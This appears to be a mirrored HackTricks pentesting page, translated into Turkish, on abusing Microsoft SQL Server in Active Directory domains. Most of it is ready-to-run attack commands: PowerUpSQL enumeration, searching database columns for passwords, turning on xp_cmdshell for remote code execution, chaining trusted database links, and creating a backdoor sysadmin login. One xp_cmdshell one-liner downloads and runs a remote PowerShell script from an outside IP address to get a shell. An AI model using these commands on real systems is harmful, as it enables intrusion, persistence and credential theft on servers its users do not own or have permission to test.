Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 22:20:43 +00:00

Translator 64d74782c3 Translated ['generic-methodologies-and-resources/pentesting-wifi/README.

2024-03-26 19:24:37 +00:00

9.8 KiB

Raw Blame History

MSSQL AD Kötüye Kullanımı

Sıfırdan Kahraman'a AWS hackleme öğrenin htARTE (HackTricks AWS Red Team Expert)!

Bir cybersecurity şirketinde mi çalışıyorsunuz? Şirketinizi HackTricks'te reklamını görmek ister misiniz? ya da PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz? ABONELİK PLANLARI'na göz atın!
PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
Resmi PEASS & HackTricks ürünlerini alın
Katılın 💬 Discord grubuna ya da telegram grubuna veya Twitter 🐦@carlospolopm'u takip edin.
Hacking püf noktalarınızı göndererek hacktricks repo ve hacktricks-cloud repo üzerinden paylaşın.

MSSQL Sıralama / Keşif

Powershell modülü PowerUpSQL bu durumda çok faydalıdır.

Import-Module .\PowerupSQL.psd1

Etki Alanı Oturumu Olmadan Ağdan Numaralandırma

# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10

#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test

Alan içinden numaralandırma

# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose

#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose

#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

MSSQL Temel Kötüye Kullanım

Veritabanına Erişim

#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"

#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"

# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize

MSSQL Uzaktan Kod Çalıştırma (RCE)

MSSQL ana bilgisayarında komutlar çalıştırmak da mümkün olabilir.

Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary

MSSQL Temel Hacking İpuçları

{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %} pentesting-mssql-microsoft-sql-server {% endcontent-ref %}

MSSQL Güvenilir Bağlantılar

Eğer bir MSSQL örneği, farklı bir MSSQL örneği tarafından güvenilir olarak kabul ediliyorsa (veritabanı bağlantısı). Kullanıcı güvenilir veritabanı üzerinde ayrıcalıklara sahipse, güven ilişkisini kullanarak diğer örnekte de sorguları yürütebilecektir. Bu güvenler zincirlenebilir ve kullanıcı belirli bir noktada yanlış yapılandırılmış bir veritabanı bulabilir ve burada komutları yürütebilir.

Veritabanları arasındaki bağlantılar, orman güvenlik ilişkileri üzerinden bile çalışır.

Powershell Kötüye Kullanımı

#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0

#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose

#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'

#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"

#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql  -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'

#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"

#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"

#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'

Metasploit

Metasploit'i kullanarak güvenilir bağlantıları kolayca kontrol edebilirsiniz.

#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session

Elde Edilebilecek Güvenilir Bağlantıları Bulma

Metasploit'in yalnızca MSSQL'de openquery() işlevini kötüye kullanmaya çalışacağını unutmayın (yani, openquery() ile komut çalıştıramazsanız komutları yürütmek için manuel olarak EXECUTE yöntemini denemeniz gerekecektir, aşağıya bakınız.)

Manuel - Openquery()

Linux üzerinden sqsh ve mssqlclient.py kullanarak bir MSSQL konsol kabuğu elde edebilirsiniz.

Windows üzerinden ayrıca HeidiSQL gibi bir MSSQL istemcisi kullanarak bağlantıları bulabilir ve komutları manuel olarak çalıştırabilirsiniz.

Windows kimlik doğrulaması kullanarak giriş yapma:

select * from master..sysservers;
EXEC sp_linkedservers;

Güvenilir bağlantıda sorguları çalıştırın

Bağlantı üzerinden sorguları çalıştırın (örnek: yeni erişilebilir örnekte daha fazla bağlantı bulun):

select * from openquery("dcorp-sql1", 'select * from master..sysservers')

{% hint style="warning" %} Çift ve tek tırnakların nerede kullanıldığını kontrol edin, bu şekilde kullanmak önemlidir. {% endhint %}

Bu güvenilir bağlantı zincirini manuel olarak sonsuza kadar devam ettirebilirsiniz.

# First level RCE
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')

# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')

Kılavuz - EXECUTE

openquery() fonksiyonundan exec xp_cmdshell gibi işlemleri gerçekleştiremiyorsanız, EXECUTE yöntemini deneyin.

Manuel - EXECUTE

Güvenilir bağlantıları kötüye kullanmak için EXECUTE yöntemini de kullanabilirsiniz:

#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"

Yerel Ayrıcalık Yükseltme

MSSQL yerel kullanıcısı genellikle SeImpersonatePrivilege adı verilen özel bir ayrıcalığa sahiptir. Bu, hesabın "kimlik doğrulamadan sonra bir istemciyi taklit etmesine" olanak tanır.

Birçok yazarın ortaya koyduğu bir strateji, bir SİSTEM hizmetini, saldırganın oluşturduğu sahte veya ara sunucuya kimlik doğrulamaya zorlamaktır. Bu sahte hizmet, SİSTEM hizmetini kimlik doğrulamaya çalışırken taklit edebilir.

SweetPotato, bu çeşitli tekniklerin bir koleksiyonunu içerir ve Beacon'ın execute-assembly komutu aracılığıyla yürütülebilir.

9.8 KiB Raw Blame History Unescape Escape